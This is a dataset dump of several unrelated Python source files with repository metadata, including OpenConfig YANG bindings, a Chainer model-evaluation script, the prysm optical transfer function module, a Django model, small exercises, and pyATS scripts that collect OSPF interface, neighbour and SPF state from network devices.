"@namespace": "http://openconfig.net/yang/policy-types",
},
"DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
},
),
is_leaf=True,
yang_name="origin-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
index = __builtin__.property(_get_index)
weight = __builtin__.property(_get_weight)
ip_address = __builtin__.property(_get_ip_address)
mac_address = __builtin__.property(_get_mac_address)
popped_mpls_label_stack = __builtin__.property(_get_popped_mpls_label_stack)
pushed_mpls_label_stack = __builtin__.property(_get_pushed_mpls_label_stack)
decapsulate_header = __builtin__.property(_get_decapsulate_header)
encapsulate_header = __builtin__.property(_get_encapsulate_header)
origin_protocol = __builtin__.property(_get_origin_protocol)
_pyangbind_elements = OrderedDict(
[
("index", index),
("weight", weight),
("ip_address", ip_address),
("mac_address", mac_address),
("popped_mpls_label_stack", popped_mpls_label_stack),
("pushed_mpls_label_stack", pushed_mpls_label_stack),
("decapsulate_header", decapsulate_header),
("encapsulate_header", encapsulate_header),
("origin_protocol", origin_protocol),
]
)
| [
"dbarrosop@dravetech.com"
] | dbarrosop@dravetech.com |
61560f710bb716afd489fc8a677ebbca9b049ae7 | 4be4862a6dea072af24be85b0bf632e08481e559 | /codes/eval_relation_model6.py | 592c04263134cf6477bb1a3532ee8dd667e1e244 | [] | no_license | manish-mishr/SceneGraphGeneration | 2834541ca0f3781fcc88ef2ca8067974bba90723 | dd15bbd88646f6194c1f3e16d2f1435473286cfd | refs/heads/master | 2021-01-19T08:17:56.026501 | 2016-05-04T09:03:16 | 2016-05-04T09:03:16 | 82,080,463 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,424 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
os.environ["CHAINER_TYPE_CHECK"] = "0" #to disable type check.
import chainer
#Check che below is False if you disabled type check
#print(chainer.functions.Linear(1,1).type_check_enable)
import os
import chainer.functions as F
from chainer import cuda
from chainer import Function, FunctionSet, Variable, optimizers, serializers
import argparse
import numpy as np
import cPickle as cpickle
import pickle
import random
import unicodecsv as csv
from tqdm import tqdm
import cv2
#Settings can be changed by command line arguments
gpu_id=0# GPU ID. if you want to use cpu, -1
model_dir='../experiment6/'
savedir=model_dir
#Override Settings by argument
parser = argparse.ArgumentParser(description=u"caption generation")
parser.add_argument("-g", "--gpu",default=gpu_id, type=int, help=u"GPU ID.CPU is -1")
parser.add_argument("-m", "--modeldir",default=model_dir, type=str, help=u"The directory that have models")
args = parser.parse_args()
gpu_id=args.gpu
model_dir= args.modeldir
#Gpu Setting
if gpu_id >= 0:
xp = cuda.cupy
cuda.get_device(gpu_id).use()
else:
xp=np
#Prepare Data
print("loading preprocessed data")
with open('../work/relationship_val_features.cpickle', 'r') as f:
image_id2image_feature=cpickle.load(f)
with open('../work/relationship_val_triple_features.cpickle', 'r') as f:
triple_id2subject_feature, triple_id2object_feature,triple_id2relation_id=cpickle.load(f)
with open('../work/relationship_test_features.cpickle', 'r') as f:
image_id2image_feature_test=cpickle.load(f)
with open('../work/relationship_test_triple_features.cpickle', 'r') as f:
triple_id2subject_feature_test, triple_id2object_feature_test,triple_id2relation_id_test=cpickle.load(f)
with open('../work/rel_triple_id2image_id.pkl', 'r') as f:
rel_triple_id2image_id=pickle.load(f)
with open('../work/index2relation.pkl', 'r') as f:
index2relation=pickle.load(f)
relation2index = dict((v, k) for k, v in index2relation.iteritems())
#Model Preparation
print "preparing model"
image_feature_dim=1024#image feature dimention per image
n_units = 128 # number of units per layer
vocab_size=len(relation2index)
model = chainer.FunctionSet()
model.img_feature2vec=F.Linear(3*image_feature_dim, n_units)#parameter W,b
model.h1=F.Linear(n_units, n_units)#hidden unit,#parameter W,b
model.h2=F.Linear(n_units, n_units)#hidden unit,#parameter W,b
model.out=F.Linear(n_units, vocab_size)#parameter W,b
#Parameter Initialization
for param in model.params():
data = param.data
data[:] = np.random.uniform(-0.1, 0.1, data.shape)
#To GPU
if gpu_id >= 0:
model.to_gpu()
#Define Newtowork (Forward)
def forward(x_data, y_data,train=True):
x = Variable(x_data,volatile=not train)
t = Variable(y_data,volatile=not train)
feature_input = F.relu(model.img_feature2vec(x))
l1 = F.dropout(F.relu(model.h1(feature_input)), train=True)
l2 = F.dropout(F.relu(model.h2(l1)), train=True)
y = model.out(l2)
loss=F.softmax_cross_entropy(y, t)
accuracy=F.accuracy(y, t)
return loss,accuracy
optimizer = optimizers.Adam()
optimizer.setup(model)
#Validiation Setting
batchsize=1024
num_train_data=len(triple_id2subject_feature)
all_triple_ids=triple_id2subject_feature.keys()
#Begin Validiating
loss_list=[]
accuracy_list=[]
for i in xrange(200):
model_place=model_dir+'/relation_model%d.chainer'%i
print model_place
if os.path.exists(model_place):
serializers.load_hdf5(model_place, model)#load modeldir
else:
continue
sum_loss = 0
sum_accuracy=0
for i in tqdm(xrange(0, num_train_data, batchsize)):
x_batch_list=[]
y_batch_list=[]
for j in xrange(batchsize):
#get ids and features
if i+j < num_train_data:
triple_id=all_triple_ids[i+j]
else:
break
subject_feature=triple_id2subject_feature[triple_id]
object_feature=triple_id2object_feature[triple_id]
image_id=rel_triple_id2image_id[triple_id]
image_feature=image_id2image_feature[image_id]
#make concatnated vector
vec=np.zeros([3*image_feature_dim],dtype=np.float32)
vec[0:image_feature_dim]=image_feature
vec[image_feature_dim:2*image_feature_dim]=subject_feature
vec[2*image_feature_dim:3*image_feature_dim]=object_feature
rel_id=triple_id2relation_id[triple_id]
x_batch_list.append(vec)
y_batch_list.append(rel_id)
x_batch=np.array(x_batch_list,dtype=np.float32)
y_batch=np.array(y_batch_list,dtype=np.int32)
if gpu_id >= 0:
x_batch = cuda.to_gpu(x_batch)
y_batch = cuda.to_gpu(y_batch)
loss, accuracy = forward(x_batch, y_batch, train=False)
sum_loss += loss.data * batchsize
sum_accuracy += accuracy.data * batchsize
mean_loss = sum_loss / num_train_data
mean_accuracy = sum_accuracy / num_train_data
print mean_loss,mean_accuracy
accuracy_list.append(mean_accuracy)
loss_list.append(mean_loss)
with open(savedir+"val_mean_loss.txt", "a") as f:
f.write(str(mean_loss)+'\n')
with open(savedir+"val_mean_accuracy.txt", "a") as f:
f.write(str(mean_accuracy)+'\n')
#Test evaluation
triple_id2subject_feature, triple_id2object_feature,triple_id2relation_id=triple_id2subject_feature_test, triple_id2object_feature_test,triple_id2relation_id_test
image_id2image_feature=image_id2image_feature_test
batchsize=1024
num_train_data=len(triple_id2subject_feature)
all_triple_ids=triple_id2subject_feature.keys()
argmax=np.argmax(accuracy_list)
model_place=model_dir+'/relation_model%d.chainer'%argmax
print model_place
serializers.load_hdf5(model_place, model)#load modeldir
sum_loss = 0
sum_accuracy=0
for i in tqdm(xrange(0, num_train_data, batchsize)):
x_batch_list=[]
y_batch_list=[]
for j in xrange(batchsize):
#get ids and features
if i+j < num_train_data:
triple_id=all_triple_ids[i+j]
else:
break
subject_feature=triple_id2subject_feature[triple_id]
object_feature=triple_id2object_feature[triple_id]
image_id=rel_triple_id2image_id[triple_id]
image_feature=image_id2image_feature[image_id]
#make concatnated vector
vec=np.zeros([3*image_feature_dim],dtype=np.float32)
vec[0:image_feature_dim]=image_feature
vec[image_feature_dim:2*image_feature_dim]=subject_feature
vec[2*image_feature_dim:3*image_feature_dim]=object_feature
rel_id=triple_id2relation_id[triple_id]
x_batch_list.append(vec)
y_batch_list.append(rel_id)
x_batch=np.array(x_batch_list,dtype=np.float32)
y_batch=np.array(y_batch_list,dtype=np.int32)
if gpu_id >= 0:
x_batch = cuda.to_gpu(x_batch)
y_batch = cuda.to_gpu(y_batch)
loss, accuracy = forward(x_batch, y_batch, train=False)
sum_loss += loss.data * batchsize
sum_accuracy += accuracy.data * batchsize
mean_loss = sum_loss / num_train_data
mean_accuracy = sum_accuracy / num_train_data
print "test loss and test accuracy"
print mean_loss,mean_accuracy
with open(savedir+"tes_mean_loss_accuracy.txt", "w") as f:
f.write(str(mean_loss)+","+str(mean_accuracy)+'\n')
| [
"stsutsui@saturn.ils.indiana.edu"
] | stsutsui@saturn.ils.indiana.edu |
f33359a0ad4254a2ca5e75a31162ed6cee672a40 | d57d97ca4cc3c9a643c23f34caeb97df6619602d | /give_n_num_nd_print_nearest_even_value.py | b8ca28667b4f3fccb9b6f8726df6709fd6cd4874 | [] | no_license | kk31398/guvi-project | 6ce88468aad3a8766f21cda4cc45904a278018d0 | adbd81967510f87181fe1d6d0bb1224cc61b1522 | refs/heads/master | 2021-07-19T00:07:14.979096 | 2018-10-08T18:30:23 | 2018-10-08T18:30:23 | 128,938,296 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | n=int(input())
a=[]
for i in range(1,n+1):
if(i%2==0):
a.append(i)
print (''.join(map(str, a[-1:])))
| [
"noreply@github.com"
] | kk31398.noreply@github.com |
dabfa0df4dcba392620e99b0a0c648b3f7b4d64f | 0c94137fdc8c742d932d63eff70b6873b60dda2a | /Lesson_3/Check/Lesson3/zadanie2.py | 3d37e9431bcfbb00aece9f8b85759baa4c11caba | [] | no_license | MakarVS/GeekBrains_Algorithms_Python | f1c9236326eec4d9ba12692527384db75928c789 | 30b006b13faedc8fd3f9d291dbdf55107f476edf | refs/heads/master | 2022-04-26T12:04:48.268870 | 2020-04-26T19:19:32 | 2020-04-26T19:19:32 | 255,070,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | #Во втором массиве сохранить индексы четных элементов первого массива. Например, если дан массив со значениями 8, 3, 15, 6, 4, 2, второй массив надо заполнить значениями 0, 3, 4, 5 (помните, что индексация начинается с нуля), т. к. именно в этих позициях первого массива стоят четные числа.
massiv1=[2,6,4,61,13,76,22,15]
massiv2=[]
for i in massiv1:
if i%2==0:
x=massiv1.index(i)
massiv2.append(x)
print(massiv2) | [
"makarvs71@yandex.ru"
] | makarvs71@yandex.ru |
43f4368447bc13386682a0dcc57ec24178673fc2 | 6ba96477d8f19ca5197b4e5aeae4d67f43c51ca6 | /min_contourss.py | 6e69c22b1cc786cd507a065c628ba93b206ca72c | [] | no_license | jgomezastro/repository | c2b7984fd8c17932e6e1954331293961364c18c4 | 61ffcc660cc697254f5e42d5b52299f1c51bfa33 | refs/heads/master | 2020-08-23T01:20:05.849500 | 2020-02-17T12:40:55 | 2020-02-17T12:40:55 | 216,514,228 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 523 | py | # -*- coding: utf-8 -*-
from numpy import zeros
def min_contourss(extracted_foreground, minaa, maxaa, minab, maxab):
# Extraction of the minimum value of the contour and its coords
a = 255
for i in range(minaa, maxaa):
for j in range(minab, maxab):
if (extracted_foreground[i][j] < a) and (extracted_foreground[i][j]!=0) \
and (extracted_foreground[i][j]!=255):
a = extracted_foreground[i][j]
min_loc = (i, j)
return a, min_loc
| [
"jesus.gomez@terabee.com"
] | jesus.gomez@terabee.com |
bd356ed87d9f9bd2821338991c74afa1757e893f | 8a22ed9db6ec992ef70e6ef8bc19615d9804dbbd | /mylib/models.py | 15204cbc42d9cb2e9a989c14eff2091d6cf35e65 | [] | no_license | owenzs/comp9900_backend | 27f3f9959cefc33d3ce9d3ee9d223b639810e55b | c876c6c8648b33aa00f35c0e4c13b73892e6ed20 | refs/heads/main | 2023-04-05T22:37:49.120236 | 2021-04-14T11:34:28 | 2021-04-14T11:34:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | from django.db import models
import uuid
class MyLib(models.Model): # admin and user use the same category, ID would be created by django
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
lib_user_id = models.ForeignKey('user.Myuser', on_delete=models.CASCADE, default=0)
lib_goods_id = models.ForeignKey('items.ItemInfo', on_delete=models.CASCADE, default=0) | [
"z5196167@ad.unsw.edu.au"
] | z5196167@ad.unsw.edu.au |
929c4b554d91766794b550e36a6c1d59d80404f6 | 2cfc228988a51857269edf2fe7b85c7f9a03e94b | /prysm/otf.py | f6583f6e4089a0dfd734bba53b56f1734431fde1 | [
"MIT"
] | permissive | fakahil/prysm | 93dd2523e6416afa2774435a6df796df8b7b6f37 | c6235043fae90540c392291051d454e8813d3884 | refs/heads/master | 2021-05-18T21:20:46.745298 | 2020-02-18T00:21:27 | 2020-02-18T00:21:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,626 | py | """A base optical transfer function interface."""
import warnings
from .conf import config
from .mathops import engine as e
from ._richdata import RichData
from .psf import PSF
from .fttools import forward_ft_unit
def transform_psf(psf, sample_spacing):
data = e.fft.fftshift(e.fft.fft2(e.fft.ifftshift(psf.data))) # no need to ifftshift first - phase is unimportant
y, x = [forward_ft_unit(sample_spacing / 1e3, s) for s in psf.shape] # 1e3 for microns => mm
return x, y, data
class OTF:
"""Optical Transfer Function."""
def __init__(self, mtf, ptf):
"""Create a new OTF Instance.
Will have .mtf and .ptf attributes holding the MTF and PTF.
Parameters
----------
data : `numpy.ndarray`
complex ndarray, 2D
x : `numpy.ndarray`
x Cartesian spatial frequencies
y : `numpy.ndarray`
y Cartesian spatial frequencies
"""
self.mtf = mtf
self.ptf = ptf
@staticmethod
def from_psf(psf, unwrap=True):
"""Create an OTF instance from a PSF.
Parameters
----------
psf : `PSF`
Point Spread Function
unwrap : `bool`, optional
if True, unwrap phase
Returns
-------
`OTF`
new OTF instance with mtf and PSF attributes holding MTF and PSF instances
"""
x, y, ft = transform_psf(psf, psf.sample_spacing)
mtf = MTF.from_ftdata(ft=ft, x=x, y=y)
ptf = PTF.from_ftdata(ft=ft, x=x, y=y, unwrap=unwrap)
return OTF(mtf=mtf, ptf=ptf)
@staticmethod
def from_pupil(pupil, efl, Q=config.Q, unwrap=True):
psf = PSF.from_pupil(pupil, efl=efl, Q=Q)
return OTF.from_psf(psf, unwrap=unwrap)
class MTF(RichData):
"""Modulation Transfer Function."""
_data_attr = 'data'
_data_type = 'image'
_default_twosided = False
def __init__(self, data, x, y, xy_unit=None, z_unit=None, labels=None):
"""Create a new `MTF` instance.
Parameters
----------
data : `numpy.ndarray`
2D array of MTF data
x : `numpy.ndarray`
1D array of x spatial frequencies
y : `numpy.ndarray`
1D array of y spatial frequencies
units : `Units`
units instance, can be shared
labels : `Labels`
labels instance, can be shared
"""
super().__init__(x=x, y=y, data=data,
xy_unit=xy_unit or config.mtf_xy_unit,
z_unit=z_unit or config.mtf_z_unit,
labels=labels or config.mtf_labels)
@staticmethod
def from_psf(psf):
"""Generate an MTF from a PSF.
Parameters
----------
psf : `PSF`
PSF to compute an MTF from
Returns
-------
`MTF`
A new MTF instance
"""
# some code duplication here:
# MTF is a hot code path, and the drop of a shift operation
# improves performance in exchange for sharing some code with
# the OTF class definition
dat = e.fft.fftshift(e.fft.fft2(psf.data)) # no need to ifftshift first - phase is unimportant
x = forward_ft_unit(psf.sample_spacing / 1e3, psf.samples_x) # 1e3 for microns => mm
y = forward_ft_unit(psf.sample_spacing / 1e3, psf.samples_y)
return MTF.from_ftdata(ft=dat, x=x, y=y)
@staticmethod
def from_pupil(pupil, efl, Q=2):
"""Generate an MTF from a pupil, given a focal length (propagation distance).
Parameters
----------
pupil : `Pupil`
A pupil to propagate to a PSF, and convert to an MTF
efl : `float`
Effective focal length or propagation distance of the wavefunction
Q : `float`
ratio of pupil sample count to PSF sample count. Q > 2 satisfies nyquist
Returns
-------
`MTF`
A new MTF instance
"""
psf = PSF.from_pupil(pupil, efl=efl, Q=Q)
return MTF.from_psf(psf)
@staticmethod
def from_ftdata(ft, x, y):
"""Generate an MTF from the Fourier transform of a PSF.
Parameters
----------
ft : `numpy.ndarray`
2D ndarray of Fourier transform data
x : `numpy.ndarray`
1D ndarray of x (axis 1) coordinates
y : `numpy.ndarray`
1D ndarray of y (axis 0) coordinates
Returns
-------
`MTF`
a new MTF instance
"""
cy, cx = (int(e.ceil(s / 2)) for s in ft.shape)
dat = abs(ft)
dat /= dat[cy, cx]
return MTF(data=dat, x=x, y=y)
@property
def tan(self):
warnings.warn('.tan is deprecated and will be removed in v0.18, please use .slices().x')
return self.slices().x
@property
def sag(self):
warnings.warn('.sag is deprecated and will be removed in v0.18, please use .slices().y')
return self.slices().y
def exact_tan(self, freq):
warnings.warn('.exact_tan is deprecated and will be removed in v0.18, please use .exact_x')
return self.exact_x(freq)
def exact_sag(self, freq):
warnings.warn('.exact_sag is deprecated and will be removed in v0.18, please use .exact_y')
return self.exact_y(freq)
class PTF(RichData):
"""Phase Transfer Function"""
def __init__(self, data, x, y, xy_unit=None, z_unit=None, labels=None):
"""Create a new `PTF` instance.
Parameters
----------
data : `numpy.ndarray`
2D array of MTF data
x : `numpy.ndarray`
1D array of x spatial frequencies
y : `numpy.ndarray`
1D array of y spatial frequencies
units : `Units`
units instance, can be shared
labels : `Labels`
labels instance, can be shared
"""
super().__init__(x=x, y=y, data=data,
xy_unit=xy_unit or config.ptf_xy_unit,
z_unit=z_unit or config.ptf_z_unit,
labels=labels or config.mtf_labels)
@staticmethod
def from_psf(psf, unwrap=True):
"""Generate a PTF from a PSF.
Parameters
----------
psf : `PSF`
PSF to compute an MTF from
unwrap : `bool,` optional
whether to unwrap the phase
Returns
-------
`PTF`
A new PTF instance
"""
# some code duplication here:
# MTF is a hot code path, and the drop of a shift operation
# improves performance in exchange for sharing some code with
# the OTF class definition
# repeat this duplication in PTF for symmetry more than performance
dat = e.fft.fftshift(e.fft.fft2(e.fft.ifftshift(psf.data)))
x = forward_ft_unit(psf.sample_spacing / 1e3, psf.samples_x) # 1e3 for microns => mm
y = forward_ft_unit(psf.sample_spacing / 1e3, psf.samples_y)
return PTF.from_ftdata(ft=dat, x=x, y=y)
@staticmethod
def from_pupil(pupil, efl, Q=2, unwrap=True):
"""Generate a PTF from a pupil, given a focal length (propagation distance).
Parameters
----------
pupil : `Pupil`
A pupil to propagate to a PSF, and convert to an MTF
efl : `float`
Effective focal length or propagation distance of the wavefunction
Q : `float`, optional
ratio of pupil sample count to PSF sample count. Q > 2 satisfies nyquist
unwrap : `bool,` optional
whether to unwrap the phase
Returns
-------
`PTF`
A new PTF instance
"""
psf = PSF.from_pupil(pupil, efl=efl, Q=Q)
return PTF.from_psf(psf, unwrap=unwrap)
@staticmethod
def from_ftdata(ft, x, y, unwrap=True):
"""Generate a PTF from the Fourier transform of a PSF.
Parameters
----------
ft : `numpy.ndarray`
2D ndarray of Fourier transform data
x : `numpy.ndarray`
1D ndarray of x (axis 1) coordinates
y : `numpy.ndarray`
1D ndarray of y (axis 0) coordinates
unwrap : `bool`, optional
if True, unwrap phase
Returns
-------
`PTF`
a new PTF instance
"""
ft = e.angle(ft)
cy, cx = (int(e.ceil(s / 2)) for s in ft.shape)
offset = ft[cy, cx]
if offset != 0:
ft /= offset
if unwrap:
from skimage import restoration
ft = restoration.unwrap_phase(ft)
return PTF(ft, x, y)
def diffraction_limited_mtf(fno, wavelength, frequencies=None, samples=128):
"""Give the diffraction limited MTF for a circular pupil and the given parameters.
Parameters
----------
fno : `float`
f/# of the lens.
wavelength : `float`
wavelength of light, in microns.
frequencies : `numpy.ndarray`
spatial frequencies of interest, in cy/mm if frequencies are given, samples is ignored.
samples : `int`
number of points in the output array, if frequencies not given.
Returns
-------
if frequencies not given:
frequencies : `numpy.ndarray`
array of ordinate data
mtf : `numpy.ndarray`
array of coordinate data
else:
mtf : `numpy.ndarray`
array of MTF data
Notes
-----
If frequencies are given, just returns the MTF. If frequencies are not
given, returns both the frequencies and the MTF.
"""
extinction = 1 / (wavelength / 1000 * fno)
if frequencies is None:
normalized_frequency = e.linspace(0, 1, samples)
else:
normalized_frequency = e.asarray(frequencies) / extinction
try:
normalized_frequency[normalized_frequency > 1] = 1 # clamp values
except TypeError: # single freq
if normalized_frequency > 1:
normalized_frequency = 1
mtf = _difflim_mtf_core(normalized_frequency)
if frequencies is None:
return normalized_frequency * extinction, mtf
else:
return mtf
def _difflim_mtf_core(normalized_frequency):
"""Compute the MTF at a given normalized spatial frequency.
Parameters
----------
normalized_frequency : `numpy.ndarray`
normalized frequency; function is defined over [0, and takes a value of 0 for [1,
Returns
-------
`numpy.ndarray`
The diffraction MTF function at a given normalized spatial frequency
"""
return (2 / e.pi) * \
(e.arccos(normalized_frequency) - normalized_frequency *
e.sqrt(1 - normalized_frequency ** 2))
def longexposure_otf(nu, Cn, z, f, lambdabar, h_z_by_r=2.91):
"""Compute the long exposure OTF for given parameters.
Parameters
----------
nu : `numpy.ndarray`
spatial frequencies, cy/mm
Cn: `float`
atmospheric structure constant of refractive index, ranges ~ 10^-13 - 10^-17
z : `float`
propagation distance through atmosphere, m
f : `float`
effective focal length of the optical system, mm
lambdabar : `float`
mean wavelength, microns
h_z_by_r : `float`, optional
constant for h[z/r] -- see Eq. 8.5-37 & 8.5-38 in Statistical Optics, J. Goodman, 2nd ed.
Returns
-------
`numpy.ndarray`
the OTF
"""
# homogenize units
nu = nu / 1e3
f = f / 1e3
lambdabar = lambdabar / 1e6
power = 5/3
const1 = - e.pi ** 2 * 2 * h_z_by_r * Cn ** 2
const2 = z * f ** power / (lambdabar ** 3)
nupow = nu ** power
const = const1 * const2
return e.exp(const * nupow)
def komogorov(r, r0):
"""Calculate the phase structure function D_phi in the komogorov approximation
Parameters
----------
r : `numpy.ndarray`
r, radial frequency parameter (object space)
r0 : `float`
Fried parameter
Returns
-------
`numpy.ndarray`
"""
return 6.88 * (r/r0) ** (5/3)
def estimate_Cn(P=1013, T=273.15, Ct=1e-4):
"""Use Weng et al to estimate Cn from meteorological data.
Parameters
----------
P : `float`
atmospheric pressure in hPa
T : `float`
temperature in Kelvin
Ct : `float`
atmospheric struction constant of temperature, typically 10^-5 - 10^-2 near the surface
Returns
-------
`float`
Cn
"""
return (79 * P / (T ** 2)) * Ct ** 2 * 1e-12
| [
"brandondube@gmail.com"
] | brandondube@gmail.com |
131cc18fb3d3f4d841fc6b9be9bb09e7f8231c84 | c13082434ca12d17cd6c586893db7fe761efb1cc | /build/source_files/ospf.py | 6c3fdc0adcef3fefe6b6a1d8d4c2b5bb0b0f70df | [] | no_license | nupe99/Network-Snapshot-Tool | 255b2a3430c26c484fd787d3f28a110d1398f0ff | 529029d0900417a4a4b76d7b52be60c7936a4a4b | refs/heads/master | 2023-03-30T15:32:26.714593 | 2021-03-25T02:00:22 | 2021-03-25T02:00:22 | 351,275,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,486 | py | from genie.testbed import load
from genie.conf.base import Interface
from unicon.core.errors import ConnectionError
from genie.metaparser.util.exceptions import SchemaEmptyParserError
import sys
def ospf_interfaces_state(devices):
#Create empty dictionary for storing all route results
pre_dic = {}
#Loop over device dictionary
for name, dev_name in devices.items():
#create empty list to store route entries emdeded within complete_dic dictionary
inner_entries = []
#create outer dictionary entry per device
pre_dic.update({name: []})
#pre_dic.update({'data': {name: []}})
#determine if OS type is XE or XR and unpack ospf neighbors output and add to dictionary
if dev_name.os == 'iosxr':
try:
ospf = dev_name.parse('show ospf vrf all-inclusive interface')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
ospf_instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in ospf_instances.keys():
areas = ospf_instances[instance]['areas']
for area in areas:
ospf_interfaces = areas[area]['interfaces']
for ospf_interface in ospf_interfaces.keys():
int_name = ospf_interfaces[ospf_interface]['name']
inner_entries.append(int_name)
pre_dic.update({name: inner_entries})
else:
log.info(f'{name} Not running OSPF. Skipping')
elif (dev_name.os == 'iosxe') or (dev_name.os == 'ios'):
try:
ospf = dev_name.parse('show ip ospf interface')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
ospf_instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in ospf_instances.keys():
areas = ospf_instances[instance]['areas']
for area in areas:
ospf_interfaces = areas[area]['interfaces']
for ospf_interface in ospf_interfaces.keys():
int_name = ospf_interfaces[ospf_interface]['name']
inner_entries.append(int_name)
pre_dic.update({name: inner_entries})
else:
log.info(f'{name} Not running OSPF. Skipping')
elif dev_name.os == 'nxos':
try:
ospf = dev_name.parse('show ip ospf interface')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
ospf_instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in ospf_instances.keys():
areas = ospf_instances[instance]['areas']
for area in areas:
ospf_interfaces = areas[area]['interfaces']
for ospf_interface in ospf_interfaces.keys():
int_name = ospf_interfaces[ospf_interface]['name']
inner_entries.append(int_name)
pre_dic.update({name: inner_entries})
else:
print(f'{name} Not running OSPF. Skipping')
else:
print(f'{dev_name.os} OS type not supported')
return pre_dic
def ospf_neighbors_state(devices):
# Create empty dictionary for storing all route results
pre_dic = {}
# Loop over device dictionary
for name, dev_name in devices.items():
# create outer dictionary entry per device
pre_dic[name] = {}
# determine if OS type is XE or XR and unpack ospf neighbors output and add to dictionary
if dev_name.os == 'iosxr':
try:
ospf = dev_name.parse('show ospf vrf all-inclusive neighbor detail')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
ospf_instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in ospf_instances.keys():
areas = ospf_instances[instance]['areas']
for area in areas.keys():
ospf_interfaces = areas[area]['interfaces']
for interface in ospf_interfaces.keys():
neighbors = ospf_interfaces[interface]['neighbors']
for ospf_id in neighbors.keys():
peer_addresses = neighbors[ospf_id]['address']
peer_router_id = neighbors[ospf_id]['neighbor_router_id']
peer_state = neighbors[ospf_id]['state']
pre_dic[name].update({peer_router_id: {
'peer_router_id': peer_router_id, 'peer_addresses': peer_addresses,
'state': peer_state}})
else:
print(f'{name} Not running OSPF. Skipping')
elif (dev_name.os == 'iosxe') or (dev_name.os == 'ios'):
try:
ospf = dev_name.parse('show ip ospf neighbor detail')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
ospf_instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in ospf_instances.keys():
areas = ospf_instances[instance]['areas']
for area in areas.keys():
ospf_interfaces = areas[area]['interfaces']
for interface in ospf_interfaces.keys():
neighbors = ospf_interfaces[interface]['neighbors']
for ospf_id in neighbors.keys():
peer_addresses = neighbors[ospf_id]['address']
peer_router_id = neighbors[ospf_id]['neighbor_router_id']
peer_state = neighbors[ospf_id]['state']
pre_dic[name].update({peer_router_id: {
'peer_router_id': peer_router_id, 'peer_addresses': peer_addresses,
'state': peer_state}})
else:
print(f'{name} Not running OSPF. Skipping')
elif (dev_name.os == 'nxos'):
try:
ospf = dev_name.parse('show ip ospf neighbors detail')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
ospf_instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in ospf_instances.keys():
areas = ospf_instances[instance]['areas']
for area in areas.keys():
ospf_interfaces = areas[area]['interfaces']
for interface in ospf_interfaces.keys():
neighbors = ospf_interfaces[interface]['neighbors']
for ospf_id in neighbors.keys():
peer_addresses = neighbors[ospf_id]['address']
peer_router_id = neighbors[ospf_id]['neighbor_router_id']
peer_state = neighbors[ospf_id]['state']
pre_dic[name].update({peer_router_id: {
'peer_router_id': peer_router_id, 'peer_addresses': peer_addresses,
'state': peer_state}})
else:
print(f'{name} Not running OSPF. Skipping')
else:
print(f'{dev_name.os} OS type not supported')
return pre_dic
def ospf_spf_state(devices):
# Create empty dictionary for storing all route results
pre_dic = {}
# Loop over device dictionary
for name, dev_name in devices.items():
# create empty list to store route entries emdeded within complete_dic dictionary
inner_entries = []
# create outer dictionary entry per device
pre_dic.update({name: []})
# determine if OS type is XE or XR and unpack ospf neighbors output and add to dictionary
if dev_name.os == 'iosxr':
try:
ospf = dev_name.parse('show ospf vrf all-inclusive')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in instances.keys():
areas = instances[instance]['areas']
for area in areas.keys():
spf_runs = areas[area]['statistics']['spf_runs_count']
pre_dic.update({name: spf_runs})
else:
log.info(f'{name} Not running OSPF. Skipping')
elif (dev_name.os == 'iosxe') or (dev_name.os == 'ios') or (dev_name.os == 'nxos'):
try:
ospf = dev_name.parse('show ip ospf')
except SchemaEmptyParserError:
ospf = {}
if ospf:
for vrf in ospf['vrf'].keys():
instances = ospf['vrf'][vrf]['address_family']['ipv4']['instance']
for instance in instances.keys():
areas = instances[instance]['areas']
for area in areas.keys():
spf_runs = areas[area]['statistics']['spf_runs_count']
pre_dic.update({name: spf_runs})
else:
log.info(f'{name} Not running OSPF. Skipping')
else:
sys.exit(f'{dev_name.os} OS type not supported')
return pre_dic | [
"nupe99@gmail.com"
] | nupe99@gmail.com |
